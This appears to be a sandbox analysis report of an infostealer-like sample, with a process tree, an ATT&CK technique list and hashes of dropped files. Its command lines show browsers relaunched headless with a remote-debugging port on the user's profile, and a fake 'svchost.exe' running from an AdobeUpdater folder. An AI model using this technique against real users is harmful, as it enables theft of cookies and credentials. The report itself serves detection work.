C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4904,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4956 /prefetch:85⤵PID:6064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5008,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5004 /prefetch:85⤵PID:2940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5020,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5032 /prefetch:15⤵
- Uses browser remote debugging
PID:2044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5076,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5084 /prefetch:15⤵
- Uses browser remote debugging
PID:2732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4984,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4728 /prefetch:15⤵
- Uses browser remote debugging
PID:4304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3392,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3020 /prefetch:15⤵
- Uses browser remote debugging
PID:3496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5084,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5092 /prefetch:15⤵
- Uses browser remote debugging
PID:4084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4756,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5104 /prefetch:85⤵PID:3596
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x268,0x26c,0x270,0x264,0x28c,0x7ffbc915f208,0x7ffbc915f214,0x7ffbc915f2205⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2156,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:25⤵PID:4216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2168,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:35⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2336,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:85⤵PID:3876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3364,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3360 /prefetch:15⤵
- Uses browser remote debugging
PID:3536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3380,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3372 /prefetch:15⤵
- Uses browser remote debugging
PID:1032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4496,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:15⤵
- Uses browser remote debugging
PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4816,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4820 /prefetch:15⤵
- Uses browser remote debugging
PID:5944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4668,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4672 /prefetch:15⤵
- Uses browser remote debugging
PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5320,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:85⤵PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5320,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:85⤵PID:1392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4532,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:85⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4696,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4540 /prefetch:85⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5876,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5864 /prefetch:85⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5924,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:15⤵
- Uses browser remote debugging
PID:3460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5984,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5960 /prefetch:85⤵PID:1812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6044,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6040 /prefetch:85⤵
- Modifies registry class
PID:4920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6116,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:85⤵PID:948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5272,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:85⤵PID:3760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=5592,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4824 /prefetch:15⤵
- Uses browser remote debugging
PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=4828,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4836 /prefetch:15⤵
- Uses browser remote debugging
PID:2928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5944,i,1646044727602108457,2639618954183212184,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:85⤵PID:5756
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exeC:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2404
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1516
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
938KB
MD52517b502d7714a4e384044a0b6c2a157
SHA1aa974d57b3b42a1a72afbe2520ae7333e35d7531
SHA25666fc943f11f465b81234c1fd1a9dfecb87082fe2560a0b1865c2679a927c76c0
SHA512f3a87225fecced58e540bab65087e45f7340307b77673e566e7074354cf3f4668815ce56bf5f04fc6dba847a0330fc89cc7c8a4ca48d2b725e39a564f4ae46aa
-
Filesize
649B
MD538d8e3d807de7f058ed7862cfbb3a296
SHA115c5ef62d3a06ce8939c4770a83c6a958b976bca
SHA2560e862fe411749544a840f1e60d5c6884e2727f0e525f7c6baf42295b384a76e9
SHA512386dae845145e5e8cdfb06a47facc2c741899d76f489111f4000ae1e12ea66f6f008bafda7abf7becefe82bcb4aa9345a8bdb8c9c8e05333eba24c530573faac
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD58fef6adf96266268eeeed5269274614f
SHA1e94ba85b7dd72be60f00529f53ba77759bce1017
SHA25688f26757895a67558b41757cbf761d823699d3f512a6e2b031782ee5c9dd6927
SHA512c569e35a676ac3bf20353918c004de688a005542332585e5bf874867eed52429f77db60e991dbf3fb339c600f64e80b361279a26ff1664b51b7824c903306ef1
-
Filesize
280B
MD5aad9ef568b38aa2ab42b57a3cbd8d8eb
SHA1efe601b188069ca6b54ba6bd63866687c5574780
SHA256ef0ca3af55b0eb83ea83d3376038feecaef97236df7c556f821c93bd08e86a9a
SHA5125a3e66a1f995ed2779c7260787a2688118406190312d31e7a77bbfef233d81bbc17dd1bbf77a08ba73e390e22dd973c173b5eb39851b359a9196f48bb6fea963
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0f255cca-5558-468b-bb32-b0b776ecf9b9.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD52b66d93c82a06797cdfd9df96a09e74a
SHA15f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA51295e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001
Filesize23B
MD53fd11ff447c1ee23538dc4d9724427a3
SHA11335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA51210a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\d923b4ee-d009-4a07-8977-5321f7564922\index-dir\the-real-index
Filesize2KB
MD596f1beaa553d04505ee6e645035e38d9
SHA1807ddf4c5a4c0f7619d3a5528023cc176a027374
SHA2568c4a3a08029e89537f88c486e5b19fd60f4c20195be5c7523b5459f55c6ab4d1
SHA512e3739ae474918ad3d8eb827e27a19c0120b2addca80fd51388e4a7376b0edb71d951f3fd6d53aaba8ada27d9fd1960d9477a6c8cc172c787c13f33b89cdcca7c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\d923b4ee-d009-4a07-8977-5321f7564922\index-dir\the-real-index~RFe57b9bb.TMP
Filesize2KB
MD57fd68ceffc78a0575f203f514737d9d0
SHA153d70c2446cb26594a0ecac5a988d2f69f30ad84
SHA256435a3fccea1c352374a153fb23253f9882d410d528f9436ec25eb6cb53296b28
SHA5127730744a3944b9a137b17a9c50b1878455ab06347e87b6da410c52a808edf93b36a109abee786f57bded37e0152239f9906ab5a0fb9684abccf6cfc95011d96a
-
Filesize
22KB
MD5a538b76a79a7ba31c9ede9b8f12cbf27
SHA157459736ac41af66802441944f2b774e703355a9
SHA256ab002fcb7a1b4d4a21c039775886b8e3c5094d8afd1f61e54ee275e1824c30a6
SHA5128944d64e2fc2ef2069ed35637b0c504e2bef4f42ac44ddb47e0e64e6e528b1b192d78a001f1ed2c086a0b5d9667506e3c1d1971453429ac1922dea43a2cd8060
-
Filesize
41KB
MD5f9a2c6c275b6fffb0ca99d89f2658b13
SHA16ba4bb12a7edef4752d12c2afd929640f16a4dad
SHA256e4f0153c4f5bb3c4ea7d8b07418fcc03edc83f041cb7d6debcd9db1ab0dad478
SHA51249646499fa3c4b200008815985c3047b3ba84912fc2fcd06185cd9f9f6e95b9c6361ee299c61e905d2dc8765358a6b587950f59b345659b17875bd0a29a98402
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD56150cdffb06b85ff104b4f7833acf26b
SHA1a064ba9f806f643f93c61c949bcb525a294be60c
SHA2562d97ae54d9c5be38a2b50466ad7e986e4d03974f714edf77f5200f41bdde2662
SHA512f62c965cfb4f1fd01f1e71c2f448115d5d6b817826bb331a6971f61be75626de00f99917c392acbe6789b6797522de3f50b67290e042383671bbb4a2fef057c2
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir5868_1222600526\CRX_INSTALL\_locales\en_US\messages.json
Filesize1KB
MD564eaeb92cb15bf128429c2354ef22977
SHA145ec549acaa1fda7c664d3906835ced6295ee752
SHA2564f70eca8e28541855a11ec7a4e6b3bc6dd16c672ff9b596ecfb7715bb3b5898c
SHA512f63ee02159812146eee84c4eb2034edfc2858a287119cc34a8b38c309c1b98953e14ca1ca6304d6b32b715754b15ba1b3aa4b46976631b5944d50581b2f49def
-
Filesize
854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
1KB
MD52a738ca67be8dd698c70974c9d4bb21b
SHA145a4086c876d276954ffce187af2ebe3dc667b5f
SHA256b08d566a5705247ddc9abf5e970fc93034970b02cf4cb3d5ccc90e1a1f8c816e
SHA512f72b9190f9f2b1acc52f7fbb920d48797a96e62dfc0659c418edbbc0299dccf1931f6c508b86c940b976016745b9877f88f2ee081d3e3d5dcdcc2cc7e7884492
-
Filesize
288B
MD54efcec3206491b4249ddba180669c796
SHA173ec174893f5cd566c85df4eec7a159f943cae09
SHA2566fb934771dc2640e04734f7ececdc1c012fa09d58aa8ee2d007a71cc53bd1709
SHA512a4a10b97f5236cecabf1f009d6c8d98c87b2643ab97acc501eb6c21521f759a835a7e0bf091bfc0069b58553ac1db94a5fefda59081507ddae362f7c04247707
-
Filesize
711B
